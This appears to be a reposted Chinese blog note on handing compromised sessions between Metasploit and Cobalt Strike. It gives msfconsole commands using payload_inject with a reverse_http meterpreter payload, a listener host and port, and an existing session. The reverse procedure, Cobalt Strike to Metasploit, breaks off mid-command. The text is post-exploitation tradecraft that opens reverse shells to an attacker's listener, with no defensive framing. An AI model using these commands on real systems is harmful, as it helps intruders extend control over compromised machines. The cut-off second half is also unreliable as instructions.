metasploit与Cobaltstrike互相派生shell
https://www.cnblogs.com/test404/p/10599981.html msf 派生 shell 给 Cobalt strike(前提有一个meterpreter) msf exploit(handler) > use exploit/windows/local/payload_inject msf exploit(payload_inject) > set PAYLOAD windows/meterpreter/reverse_http msf exploit(payload_inject) > set DisablePayloadHandler true msf exploit(payload_inject) > set LHOST 192.168.229.143 msf exploit(payload_inject) > set LPORT 1212 msf exploit(payload_inject) > set SESSION 1 msf exploit(payload_inject) > exploit Cobalt strike 派生 shell 给 MSF(前提有个beaconshell) msf > use exploit/multi/handler msf exploit(handler) > set